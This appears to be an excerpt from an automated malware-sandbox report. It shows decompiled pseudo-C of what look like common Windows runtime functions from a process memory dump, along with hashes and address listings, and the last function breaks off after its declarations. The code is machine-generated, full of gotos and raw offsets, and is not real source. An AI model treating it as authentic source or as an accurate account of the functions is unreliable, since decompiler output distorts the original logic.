                                                      0x0491d831
                                                      0x0491d80d
                                                      0x00000000
                                                      0x0491d800
                                                      0x0496b47f
                                                      0x0496b485
                                                      0x00000000
                                                      0x0496b485
                                                      0x0491d665
                                                      0x0491d652
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7dcf30dcc3dba72e65ca69afdb97eeae74554abcfffc17c12419e2af1549e5fc
                                                      • Instruction ID: 8e3488cde0d13dbf6696a13aab0d07275c77f372cd280b88bfee56c49566dc71
                                                      • Opcode Fuzzy Hash: 7dcf30dcc3dba72e65ca69afdb97eeae74554abcfffc17c12419e2af1549e5fc
                                                      • Instruction Fuzzy Hash: 98E1B170B0536D8FEB24DF18C940BA9B7B6BF85318F0402B9D90A972A0E734BD81CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0491849B, Relevance: .3, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E0491849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x49df9c0);
				E0495D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x49f7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0491CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04922280( *[fs:0x30], 0x49f8550);
						_t139 =  *0x49f7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0493F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0491FFB0(_t193, _t235, 0x49f8550);
								L5:
								return E0495D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04901C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x49f7b9c; // 0x0
							_t235 = L04924620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x49f7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0493A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0491FFB0(_t193, _t235, 0x49f8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L049277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L049277F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x49f7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x49f7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E049437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x49f7b9c; // 0x0
									_t214 = L04924620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E049437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x49f7b10 =  *0x49f7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x49f7b04 =  *0x49f7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L049277F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L049277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x49f7b08 =  *0x49f7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E049457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0494F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L049277F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0493A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L049277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E049496C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                      0x0491849b
                                                      0x0491849b
                                                      0x0491849b
                                                      0x0491849b
                                                      0x0491849d
                                                      0x049184a2
                                                      0x049184a7
                                                      0x049184b1
                                                      0x049184d8
                                                      0x00000000
                                                      0x049184b3
                                                      0x049184c4
                                                      0x049184c9
                                                      0x049184cd
                                                      0x049184cf
                                                      0x049184cf
                                                      0x049184d6
                                                      0x049184e6
                                                      0x049184e9
                                                      0x049184ec
                                                      0x049184ef
                                                      0x049184f2
                                                      0x049184f4
                                                      0x049184fc
                                                      0x04918501
                                                      0x04918506
                                                      0x04918509
                                                      0x049186e0
                                                      0x049186e5
                                                      0x049186e8
                                                      0x049186ed
                                                      0x049186f0
                                                      0x049186f2
                                                      0x04969afd
                                                      0x04969b02
                                                      0x049184da
                                                      0x049184df
                                                      0x049184df
                                                      0x049186fa
                                                      0x049186fd
                                                      0x049186fe
                                                      0x04918701
                                                      0x04918706
                                                      0x04918709
                                                      0x0491870b
                                                      0x00000000
                                                      0x00000000
                                                      0x04918711
                                                      0x04918725
                                                      0x04918727
                                                      0x0491872a
                                                      0x0491872c
                                                      0x04969af0
                                                      0x04969af5
                                                      0x04918732
                                                      0x04918732
                                                      0x04918732
                                                      0x04918735
                                                      0x04918737
                                                      0x04918515
                                                      0x04918515
                                                      0x04918518
                                                      0x0491851d
                                                      0x04918523
                                                      0x04918527
                                                      0x0491852b
                                                      0x04918537
                                                      0x04918539
                                                      0x0491853c
                                                      0x0491853e
                                                      0x0491868c
                                                      0x04918691
                                                      0x04918699
                                                      0x0491869b
                                                      0x04918744
                                                      0x04918748
                                                      0x049186a1
                                                      0x049186a1
                                                      0x049186a1
                                                      0x049186a4
                                                      0x049186a8
                                                      0x04969bdf
                                                      0x04969bdf
                                                      0x049186ae
                                                      0x049186b0
                                                      0x00000000
                                                      0x049186b6
                                                      0x00000000
                                                      0x04969be9
                                                      0x049186b0
                                                      0x04918544
                                                      0x0491854a
                                                      0x0491854d
                                                      0x04918551
                                                      0x0491876e
                                                      0x04918778
                                                      0x0491877b
                                                      0x04918780
                                                      0x04918557
                                                      0x04918557
                                                      0x0491855d
                                                      0x0491855d
                                                      0x0491856b
                                                      0x0491856e
                                                      0x04918570
                                                      0x04918573
                                                      0x04918576
                                                      0x04918576
                                                      0x04918579
                                                      0x0491857b
                                                      0x00000000
                                                      0x00000000
                                                      0x04918581
                                                      0x049185a0
                                                      0x049185a2
                                                      0x049185a5
                                                      0x049185a7
                                                      0x04969b1b
                                                      0x04969b1b
                                                      0x0491862e
                                                      0x0491862e
                                                      0x04918631
                                                      0x04918631
                                                      0x04918634
                                                      0x04918636
                                                      0x04918669
                                                      0x04918669
                                                      0x0491866b
                                                      0x04969bbf
                                                      0x04969bc4
                                                      0x04969bc8
                                                      0x04969bce
                                                      0x04969bce
                                                      0x04918671
                                                      0x04918671
                                                      0x04918674
                                                      0x04918676
                                                      0x04969bae
                                                      0x04969bae
                                                      0x04918676
                                                      0x0491867c
                                                      0x0491867e
                                                      0x04918688
                                                      0x04918688
                                                      0x00000000
                                                      0x0491867e
                                                      0x04918638
                                                      0x04918638
                                                      0x0491863b
                                                      0x0491863e
                                                      0x0491863f
                                                      0x04918642
                                                      0x04918645
                                                      0x04918648
                                                      0x0491864d
                                                      0x04969b69
                                                      0x04969b6e
                                                      0x04969b7b
                                                      0x04969b81
                                                      0x04969b85
                                                      0x04969b89
                                                      0x04969ba7
                                                      0x04969b8b
                                                      0x04969b91
                                                      0x04969b9a
                                                      0x04969b9f
                                                      0x04969b9f
                                                      0x04918788
                                                      0x0491878d
                                                      0x04918763
                                                      0x04918763
                                                      0x04918766
                                                      0x00000000
                                                      0x04918766
                                                      0x04969b70
                                                      0x00000000
                                                      0x04969b70
                                                      0x04918656
                                                      0x0491865a
                                                      0x0491865c
                                                      0x04918752
                                                      0x04918756
                                                      0x00000000
                                                      0x00000000
                                                      0x0491875e
                                                      0x00000000
                                                      0x0491875e
                                                      0x04918662
                                                      0x04918662
                                                      0x04918662
                                                      0x04918666
                                                      0x00000000
                                                      0x04918666
                                                      0x049185b7
                                                      0x049185b9
                                                      0x049185bc
                                                      0x049185bf
                                                      0x049185cc
                                                      0x049185d1
                                                      0x049185d4
                                                      0x049185db
                                                      0x049185de
                                                      0x049185e0
                                                      0x04969b5f
                                                      0x00000000
                                                      0x04969b5f
                                                      0x049185e6
                                                      0x049185ea
                                                      0x049186c3
                                                      0x049186c5
                                                      0x049186c8
                                                      0x049186ca
                                                      0x04969b16
                                                      0x00000000
                                                      0x04969b16
                                                      0x049186d6
                                                      0x049185f6
                                                      0x049185f6
                                                      0x049185f9
                                                      0x04918602
                                                      0x04918606
                                                      0x0491860a
                                                      0x0491860b
                                                      0x0491860e
                                                      0x04918611
                                                      0x00000000
                                                      0x04918611
                                                      0x049185f3
                                                      0x00000000
                                                      0x049185f3
                                                      0x04918619
                                                      0x0491861e
                                                      0x0491861e
                                                      0x04918621
                                                      0x04918622
                                                      0x04918623
                                                      0x04918625
                                                      0x0491862c
                                                      0x00000000
                                                      0x0491873d
                                                      0x00000000
                                                      0x0491873d
                                                      0x04918737
                                                      0x0491850f
                                                      0x04918512
                                                      0x00000000
                                                      0x04918512
                                                      0x00000000
                                                      0x049184d6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f100ef0cbd40b8ec8341bb4024f199b83a6d3dd60e64818f6beff246a8c60168
                                                      • Instruction ID: 2d352c83eb51a668c5f1db1de0a87dfc572119ce63aa110be5ed4e734ed25ccd
                                                      • Opcode Fuzzy Hash: f100ef0cbd40b8ec8341bb4024f199b83a6d3dd60e64818f6beff246a8c60168
                                                      • Instruction Fuzzy Hash: 6CB12AB0E00209DFDB14EFE9C984AADBBBAFF85304F104539E406AB255E770B945DB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493513A, Relevance: .3, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0493513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49fd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0494D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04922280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04924620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0494F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0491FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x49fb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0494B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                      0x04935142
                                                      0x0493514c
                                                      0x04935150
                                                      0x04935157
                                                      0x04935159
                                                      0x0493515e
                                                      0x04935165
                                                      0x04935169
                                                      0x0493516c
                                                      0x04935172
                                                      0x04935176
                                                      0x0493517a
                                                      0x0493517a
                                                      0x0493517a
                                                      0x0493517f
                                                      0x04976d8b
                                                      0x04976d8e
                                                      0x04976d91
                                                      0x04976d95
                                                      0x04976d98
                                                      0x04976d9c
                                                      0x04976da0
                                                      0x04976da3
                                                      0x04976da7
                                                      0x04976e26
                                                      0x04976e26
                                                      0x04976e2a
                                                      0x049351f9
                                                      0x049351f9
                                                      0x049351fe
                                                      0x04976e33
                                                      0x04976e33
                                                      0x04976e39
                                                      0x04976e3d
                                                      0x04976e46
                                                      0x04976e50
                                                      0x00000000
                                                      0x00000000
                                                      0x04976e52
                                                      0x04976e53
                                                      0x04976e56
                                                      0x04976e5d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04976e5f
                                                      0x04976e67
                                                      0x04976e77
                                                      0x04976e7f
                                                      0x04976e80
                                                      0x04976e88
                                                      0x04976e90
                                                      0x04976e9f
                                                      0x04976ea5
                                                      0x04976ea9
                                                      0x04976eb1
                                                      0x04976ebf
                                                      0x00000000
                                                      0x00000000
                                                      0x04976ecf
                                                      0x04976ed3
                                                      0x00000000
                                                      0x00000000
                                                      0x04976edb
                                                      0x04976ede
                                                      0x04976ee1
                                                      0x04976ee8
                                                      0x04976eeb
                                                      0x04976eed
                                                      0x04976ef0
                                                      0x04976ef4
                                                      0x04976ef8
                                                      0x04976efc
                                                      0x00000000
                                                      0x00000000
                                                      0x04976f0d
                                                      0x04976f11
                                                      0x04976f32
                                                      0x04976f37
                                                      0x04976f3b
                                                      0x04976f3e
                                                      0x04976f41
                                                      0x04976f46
                                                      0x00000000
                                                      0x00000000
                                                      0x04976f4c
                                                      0x04976f50
                                                      0x04976f50
                                                      0x04976f54
                                                      0x04976f62
                                                      0x04976f65
                                                      0x04976f6d
                                                      0x04976f7b
                                                      0x04976f7b
                                                      0x04976f93
                                                      0x04976f98
                                                      0x04976fa0
                                                      0x04976fa6
                                                      0x04976fb3
                                                      0x04976fb6
                                                      0x04976fbf
                                                      0x04976fc1
                                                      0x04976fd5
                                                      0x04976fda
                                                      0x04976fda
                                                      0x04976fdd
                                                      0x04976fe2
                                                      0x04976fe7
                                                      0x04976feb
                                                      0x04976fef
                                                      0x04976ff3
                                                      0x0493520c
                                                      0x0493520c
                                                      0x0493520f
                                                      0x04935215
                                                      0x04935234
                                                      0x0493523a
                                                      0x0493523a
                                                      0x04935244
                                                      0x04935245
                                                      0x04935246
                                                      0x04935251
                                                      0x04935251
                                                      0x04976f13
                                                      0x04976f17
                                                      0x04976f17
                                                      0x04976f18
                                                      0x04976f1b
                                                      0x04976f1f
                                                      0x04976f23
                                                      0x00000000
                                                      0x04976f28
                                                      0x04935204
                                                      0x04935204
                                                      0x04935208
                                                      0x00000000
                                                      0x04935208
                                                      0x04935185
                                                      0x04935188
                                                      0x0493518a
                                                      0x0493518e
                                                      0x04935195
                                                      0x04976db1
                                                      0x04976db5
                                                      0x04976db9
                                                      0x0493519b
                                                      0x0493519b
                                                      0x0493519e
                                                      0x049351a7
                                                      0x049351a9
                                                      0x049351a9
                                                      0x049351b5
                                                      0x049351b8
                                                      0x049351bb
                                                      0x049351be
                                                      0x049351c1
                                                      0x049351c5
                                                      0x049351c9
                                                      0x049351cd
                                                      0x049351cd
                                                      0x049351d8
                                                      0x049351dc
                                                      0x049351e0
                                                      0x04976dcc
                                                      0x04976dd0
                                                      0x04976dd5
                                                      0x04976ddd
                                                      0x04976de1
                                                      0x04976de1
                                                      0x04976de5
                                                      0x04976deb
                                                      0x04976df1
                                                      0x04976df7
                                                      0x04976dfd
                                                      0x04976e01
                                                      0x04976e05
                                                      0x04976e09
                                                      0x04976e0d
                                                      0x04976e11
                                                      0x04976e11
                                                      0x049351eb
                                                      0x04976e1a
                                                      0x04976e1f
                                                      0x04976e21
                                                      0x04976e23
                                                      0x00000000
                                                      0x049351f1
                                                      0x049351f1
                                                      0x00000000
                                                      0x049351f1

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 319a85d85d7f3db0afcddbd1abad8702ac9c43071ce06ca8a783531f5e53978b
                                                      • Instruction ID: 805fee9d0b3b75c6172856f058a29eaf645a0e80fcb76f9e73111935924c99ce
                                                      • Opcode Fuzzy Hash: 319a85d85d7f3db0afcddbd1abad8702ac9c43071ce06ca8a783531f5e53978b
                                                      • Instruction Fuzzy Hash: 64C132756087809FD354CF28C580A6AFBF1BF89318F148A6EF8998B352D771E845CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049303E2, Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E049303E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
